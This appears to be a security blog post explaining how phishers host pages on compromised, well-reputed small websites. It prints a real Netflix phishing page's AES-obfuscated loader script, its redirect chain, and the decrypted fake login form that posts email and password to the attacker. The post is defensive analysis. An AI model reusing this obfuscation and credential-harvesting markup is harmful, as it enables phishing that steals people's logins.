The One Valuable Thing All Websites Have: Reputation (and Why It’s Attractive to Phishers)

Presently sponsored by: Do you desire peace of mind? The hackers don’t wait, secure your website and mobile apps with Gold Security today.

Here’s something I hear quite a bit when talking about security things:

Our site isn’t a target, it doesn’t have anything valuable on it

This is usually the retort that comes back in defence of some pretty shady practices and in the mind of the defendant, it’s a perfectly reasonable position. They don’t collect any credentials, they don’t have any payment info and in many cases, the site is simply a static representation of content that rarely changes. So what upside is there for an attacker?

Reputation. More specifically, a non-negative reputation because that’s a valuable thing to attackers wanting to mount a phishing campaign. This happens on an alarmingly regular basis and there was a perfect illustration of precisely this when it was discovered that spammers were hosting files on Equifax’s website (every time we thought it couldn’t get any worse…). This subheading within the piece describes precisely what the attraction is:

Spammers Crave Legitimate Domains

I’ll come back to illustrating the value proposition of this a little later on but for now, I want to share a collection of examples I’ve been saving over the last few months. What follows are all phishing emails which made their way through Microsoft’s Outlook.com filters and landed in my inbox. For example, this one suggesting that I needed to upgrade my account:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Looks legit, nice work on the “Microsof” spelling too guys! Ok, it actually looks terrible but the phishing page it then links to is pretty convincing:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Here’s the real point of this post though: note the domain in the image above now look at the actual legitimate website it sits within:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

It’s a normal, garden variety website. Pretty rudimentary, running on WordPress and very possibly using any number of plugins which have had serious security risks in the past. It’s the sort of site people think doesn’t pose any upside to an attacker, yet here we are.

Another phish for Microsoft credentials which again, made it directly into my inbox was this one:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

It displays many of the hallmarks of a phishing attack including establishing a sense of urgency, providing a call to action and attempting to create an air of authenticity. The text “This message is from a trusted sender” you see in the header is the name of the recipient and that same text in the body of the email is nothing more than stylised HTML.

It links through to a similarly convincing phishing page:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

This page happily loaded through my ISP and through Chrome’s anti-phishing protection because the site was yet to be flagged as malicious. Once I stripped off the path, here’s what was on the site:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Nobody ever suspects daffodils! Chrome certainly didn’t but if you try going to that site now, you’ll have a very different experience. Now I doubt the Daffodil Excursion website ever had much going on for it traffic wise, but it’s value proposition was that it didn’t have a negative reputation!

Another Microsoft phish came through which looked particularly convincing:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

And once again, served up a pretty slick looking phishing page:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Which, per the theme of this post, is actually a perfectly legitimate website for a club in Northern Ireland:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

For a change of pace from Microsoft phishes, a Netflix one came through:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

This eventually bounced me over to this page:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

You’ll see this is on the domain awpaugp250.siterubix.com which is now disabled and would originally have been provisioned as a site built on the SiteRubix service. That’s not the interesting bit here, it’s that the original email click went through to customers.easy.net.gr/xad/:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Which did a 302 to 2no.co/3YR3B3 which then did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/ which then did a 302 to the 1931f0840cfa5b56436809863fc47c2d path which did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/ which was the final destination. It bounced through multiple legitimate hosts before arriving at the destination. But that was just the beginning…

That final page then contained the following script which uses this implementation of AES in JavaScript to decrypt an encrypted payload:

<html><head><script src="http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/hok.js"></script><script>
var hea2p = 
('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz'); 
var hea2t = 
'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';
var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);
document.write(output)</script>

Once decrypted, it’s written out to the page like this:

<title>Netflix</title>
<meta content="" name="keywords">
<meta content="" name="description">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<link type="text/css" rel="stylesheet" href="css/z.css">
<link type="text/css" rel="stylesheet" href="css/a.css">
<link rel="shortcut icon" href="img/nficon2015.ico">

</head>
<body>
<div id="appMountPoint">
<div class="login-wrapper" data-reactid=".n04xqojxfk" data-react-checksum="-290266296">
<div class="nfHeader login-header signupBasicHeader" data-reactid=".n04xqojxfk.0">
<a href="#" class="icon-logoUpdate nfLogo signupBasicHeader" data-reactid=".n04xqojxfk.0.1">
<span class="screen-reader-text" data-reactid=".n04xqojxfk.0.1.0">Netflix</span></a>
</div>

<div class="login-body" data-reactid=".2app2tcssn4.1">
<div class="login-content login-form" data-reactid=".2app2tcssn4.1.0">
<h1 data-reactid=".2app2tcssn4.1.0.0">Sign In</h1>


<form class="login-form" action="r1.php" method="post">

<label class="login-input login-input-email ui-label ui-input-label">
<span class="ui-label-text">Email</span>
<input class="ui-text-input" name="email" type="email" required="" value="" tabindex="0"></label>

<label class="login-input login-input-password ui-label ui-input-label">
<span class="ui-label-text">Password</span>
<input class="ui-text-input" name="password" type="password" required="" tabindex="0"></label>

<div class="login-forgot-password-wrapper"><a href="#" tabindex="3" "="">Forgot your email or password?</a>
</div>

<div class="login-remember-me-wrapper">
<div class="login-remember-me"><label class="login-label-remember-me">
<input type="checkbox" class="login-input-remember-me" value="true" checked="" name="rememberMeCheckbox">
<span>Remember me on this device.</span>
</label>

</div>
</div>

<button class="btn login-button btn-submit btn-small" type="submit" autocomplete="off" tabindex="0">
<spa>Sign In</spa></button>

</form>


<div class="facebookForm regOption">
<button class="btn disabled cta-fb-gdp btn-submit btn-small" type="submit" disabled="" autocomplete="off" tabindex="0">
<span class="icon-facebook"></span>
<span class="fbBtnText">Login with Facebook</span>
</button>
</div>


<div class="login-signup-now">
<br>
<span>New to Netflix? </span>

<a class=" " target="_self" href="#">Sign up now</a>
<span>.</span>
</div>
</div>
</div>

<div class="site-footer-wrapper login-footer">
<div class="footer-divider">
</div>

<div class="site-footer">
<p class="footer-top">
<a class="footer-top-a" href="#">Questions? Contact us.</a></p>
<ul class="footer-links structural">

<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Gift Card Terms</span></a>
</li>

<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Terms of Use</span>
</a>
</li>

<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Privacy Statement</span></a>
</li>
</ul>

<div class="lang-selection-container" id="lang-switcher">
<div class="ui-select-wrapper">


<div class="select-arrow medium prefix globe">
<select class="ui-select medium" tabindex="0">
<option value="#">English</option>
</select>
</div>


</div>
</div>
<p class="copy-text" <="" p="">
</p></div>
</div>
</div>
</div>





</body></html>
</pre>

And there’s your phishing page which all began with that one little hop through a compromised site.

Now compare the experience in the images above – namely the fact that I could load the sites without warning – to the following experiences. For example, if I attempt to load the aforementioned daffodil site in Chrome today:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

This is simply a matter of sufficient time having passed that Google has now classified the site as malicious and placed a rather unmissable warning on it.

Here’s what happens if I try and hit a site that Freedome VPN recognises as malicious:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Turn the VPN off and that same site is flagged my ISP:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

Then there’s Microsoft’s safe links implementation which intervenes when accessing a malicious URL sent by email:

The One Valuable Thing All Websites Have: Reputation (and Why It's Attractive to Phishers)

So, you see the pattern: domains with non-negative reputations are valuable – that’s the attraction here and it’s just as attractive whether a site is collecting valuable user credentials or posting photos of daffodils! Every site has something valuable they need to protect and that’s their reputation. Let that go, and the only thing you’re left with is those last 4 screen shots above.

Leave a Reply

Your email address will not be published.